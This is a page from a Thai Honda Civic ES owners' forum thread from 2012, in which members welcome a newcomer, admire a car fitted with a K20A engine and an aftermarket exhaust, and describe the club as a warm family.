โป่ง แบบนี้ สวยนะครับ วาง K20A เต็มครับคันนี้

งามมากครับคันนี้ 
es330

เข้าร่วม: 10 พฤศจิกา 2008
ตอบ: 1890

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3172
ให้คำขอบคุณ: 6546

อังคาร, 9 ตุลา 2012 17:11 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
คันนี้ลง XO "Civigra" แรงโคตรๆจาก Backstage ....

รายละเอียด Civigra
Kriss_es04

ชื่อเล่น: อ๊อด

ตอบ: 1745

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1543
ให้คำขอบคุณ: 234

ที่อยู่: ดินแดง-แจ้งวัฒนะ-นนทบุรี-มหาชัย-พระราม2-กระทุ่มแบน-สามพราน
อังคาร, 9 ตุลา 2012 17:26 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
ขอแนะนำ
ระวังจะถอนตัวไม่ขึ้น นะครับ
Jacksu

เข้าร่วม: 13 มกรา 2009
ตอบ: 425

ได้รับคำขอบคุณ: 498
ให้คำขอบคุณ: 87

อังคาร, 9 ตุลา 2012 17:55 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
ลองซะ แล้วท่านจะรู้...
rakyat

ชื่อเล่น: โก้

เข้าร่วม: 11 กรกฎา 2012
ตอบ: 1262

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 663
ให้คำขอบคุณ: 482

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 9 ตุลา 2012 19:00 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
wow wow wow es หนึ่งเดียวเท่านั้น
yodmillcon

ชื่อเล่น: ยอด

เข้าร่วม: 05 กุมภา 2012
ตอบ: 145

ได้รับคำขอบคุณ: 75
ให้คำขอบคุณ: 109

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 9 ตุลา 2012 19:14 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
civic civic es es civic es
วุฒิชัย

ชื่อเล่น: ตั้ม

เข้าร่วม: 26 มิถุนา 2011
ตอบ: 4151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3281
ให้คำขอบคุณ: 4338

อังคาร, 9 ตุลา 2012 19:15 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
มาเลยครับครอบครัวนี้อบอุ่นดีครับ
OiShIz

ชื่อเล่น: ไดร์ฟ

เข้าร่วม: 13 พฤศจิกา 2009
ตอบ: 969

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1576
ให้คำขอบคุณ: 2107

สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 9 ตุลา 2012 21:12 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
ยินดีต้อนรับนะครับ 
ake_es

เข้าร่วม: 01 มิถุนา 2009
ตอบ: 838

Guru ES
Guru ES

ได้รับคำขอบคุณ: 710
ให้คำขอบคุณ: 244

อังคาร, 9 ตุลา 2012 21:22 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ
ES2.0 พิมพ์ว่า:
ที่นี่ไม่ใช่แค่คลับของคนที่ใช้รถรุ่นเดียวกันเฉยๆนะ
ที่นี่มีมากกว่านั้นมันเป็นครอบครัวๆนึง ซึ่งผมเองก็
เข้ามาที่นี่ทุกวันทั้งที่ผมขายรถไปแล้ว ลองดูคับ ES
อะหลั่ยไม่แพงอย่างที่คิดหรอก แต่ของแต่งนี่แหละ
ตัวดีเลย ถ้าเทียบกับปั้นอีโวผมว่าถูกกว่านะ ^^

เหมือนกันครับผมขายไป3ปีแล้วตอนนี้ใช้fdแต่เข้าบอร์ดesทุกวันไม่รู้ทำไม...........
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~ 
ake_es

เข้าร่วม: 01 มิถุนา 2009
ตอบ: 838

Guru ES
Guru ES

ได้รับคำขอบคุณ: 710
ให้คำขอบคุณ: 244

อังคาร, 9 ตุลา 2012 21:26 - แอบด่อม ๆ ย่องๆ เข้ามาเงียบๆ ครับ หุๆ

ตามที่คุณฟานว่าครับผมที่เจอที่งาน กูขับฮอนด้า ที่บอกว่าขายesไป3ปีแต่ยังเข้าบอร์ดทุกวันครับที่น้องๆเค้าบอกว่าหน้าเหมือนกันนี่แหละ
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~ 
ตอบ
หน้า 2 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.